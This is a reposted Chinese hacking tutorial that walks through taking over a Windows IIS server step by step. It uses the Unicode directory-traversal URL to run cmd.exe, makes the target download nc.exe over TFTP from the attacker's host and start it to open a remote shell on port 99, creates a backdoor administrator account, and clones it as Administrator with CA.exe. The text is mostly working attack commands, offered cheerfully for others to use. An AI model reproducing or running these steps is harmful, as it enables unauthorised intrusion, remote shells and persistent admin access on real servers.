某晚在榕哥的网站上看到榕哥写的一篇文章,关于客隆administratro的权限.我抱着学习的态度想试一试.果然.成功了..
　　
　　嘿嘿.榕 哥的东西就是好.再不怎么会有人说他的网站表示着国内的网络安全呢.
　　
　　以下是我的全部过程.我也不敢自已独吞啊.所以拿出来和大家一起分享喽.
　　
　　入侵其实和炒菜一样.都得先备好料..反正我是这么理解的.(我可不是厨师哦)以下是我备的料.
　　
　　GetAccount.exe (榕哥的东西)
　　CA.exe (也是榕哥的东西
　　X-way2.5.zip (一个扫描软件)
　　tftpd32.exe (一个小巧的ftp服务器软件)
　　nc.exe (一个可以telnet到99端口的东西)
　　好了.下面开始吧..
　　
　　第一步.
　　
　　 用X-way2.5扫描xxx.xxx.xxx.xxx发现xxx.xxx.xxx.xxx/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
　　哈哈.找到了..就这个吧.
　　
　　第二步
　　
　　运行tftpd32.运行之后你的机器就是一个ftp服务器了.回到你的浏览器，在地址栏里填入http://xxx.xxx.xxx.xxx/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+tftp -i xxx.xxx.xxx.xxx GET nc.exe c:\\inetpub\\scripts\\nc.exe然后等那么一小会就会传到主机c:\inetpub\scripts\目录了,这时我们要让主机运行nc.exe, xxx.xxx.xxx.xxx/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+c:\inetpub\scripts\nc.exe
　　
　　第三步
　　
　　然后telnet xxx.xxx.xxx.xxx 99 呵呵...进来了吧.
　　
　　下面我们建一个用户名为daoker口令为daoker的用户.
　　net user daoker daoker /add
　　将daoker这个用户加入administrators组
　　net localgroup administrators daoker /add
　　
　　第四步
　　
　　下面利用CA.exe 将daoker克隆为Administrator
　　ca \\xxx.xxx.xxx.xxx test test daoker password
　　这时，daoker就成为了超级用户，并有具有和Administrator同样的设置,桌面、菜单等等。
　　是不是很爽啊.发果要是再开个3389什么的.是不是很爽啊...
　　end
　　
　　文章转载地址：http://www.cnpaf.net/Class/hack/06101110491533669989.html